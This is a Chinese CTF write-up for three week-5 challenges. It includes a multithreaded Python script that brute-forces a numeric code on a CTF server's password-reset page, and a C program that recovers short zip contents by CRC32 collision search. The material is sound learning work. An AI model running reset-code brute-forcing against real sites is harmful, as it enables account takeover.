hduisa_ctf_week5_writeup

Problem ID:17

EasyUser

一看就是一个爆破验证码的题目,然后就开始写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import urllib    
import urllib2
import re
import threading

def run(x,y):
global flag
if flag == 1:
return 0
for i in range(x,y):
url = 'http://104.236.171.163/week5/easyuser/forget.php'
values = {'number' : i}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
# print html
match = re.match(r'.*10.*', html, re.S)
if match:
print '%d is not psd' %i
else:
print '%d is the psd' %i
flag = 1;
break
# print html
# print match
print "current has %d threads" % (threading.activeCount() - 1)

global flag
flag = 0
t1 = threading.Thread(target = run, args = (500000,600000))
t2 = threading.Thread(target = run, args = (600000,700000))
t3 = threading.Thread(target = run, args = (700000,800000))
t4 = threading.Thread(target = run, args = (800000,900000))
t5 = threading.Thread(target = run, args = (900000,1000000))
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
# for i in range(5):
# t3 = threading.Thread(target = run, args=(500000,600000))
# t3.start()

Problem ID:18

听说你们想玩其他类型的题目?

一道之前bkpctf的一道题的弱化版,叫做punch。明天有空可以把那个题写一下贴出来,就这道题而言直接查表就好了。可以看下这个虚拟的打印机

Problem ID:19

上面那个太简单了

这次给了一个压缩包,可以看见很短的长度和crc,所以可能是通过爆破来解题,查了一下资料,写了个脚本开始爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#include <windows.h>
#include <stdio.h>
//crc32.h
#ifndef _CRC32_H
#define _CRC32_H

UINT crc32( UCHAR *buf, int len);

#endif

static UINT CRC32[256];
static char init = 0;

static void init_table()
{
int i,j;
UINT crc;
for(i = 0;i < 256;i++)
{
crc = i;
for(j = 0;j < 8;j++)
{
if(crc & 1)
{
crc = (crc >> 1) ^ 0xEDB88320;
}
else
{
crc = crc >> 1;
}
}
CRC32[i] = crc;
}
}

//crc32
UINT crc32( UCHAR *buf, int len)
{
UINT ret = 0xFFFFFFFF;
int i;
if( !init )
{
init_table();
init = 1;
}
for(i = 0; i < len;i++)
{
ret = CRC32[((ret & 0xFF) ^ buf[i])] ^ (ret >> 8);
}
ret = ~ret;
return ret;
}

int main()
{
char ss[]="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
char sss[6]={0};
int a,b,c,d,e;

int _crc32 = 0;

for(a=0; a<strlen(ss); a++)
{
for(b=0; b<strlen(ss); b++)
{
for(c=0; c<strlen(ss); c++)
{
for(d=0; d<strlen(ss); d++)
{
for(e=0; e<strlen(ss); e++)
{
sss[0] = ss[a];
sss[1] = ss[b];
sss[2] = ss[c];
sss[3] = ss[d];
sss[4] = ss[e];

_crc32 = crc32((UCHAR *)sss, 5);

if(_crc32 == 0xF30BDD6C)
{
printf("%s\n", sss);
//system("PAUSE");
}
}
}
}
}
}

return 0;
}

这里还有个坑,这里hash碰撞了,第二部分,有两个一样的crc,一个是IYF35,一个是9e76e,一开始为了节省时间,读到第一个符合的crc之后就停止了,导致一直不对,后来跑全了拿到了第二个,提交,对了。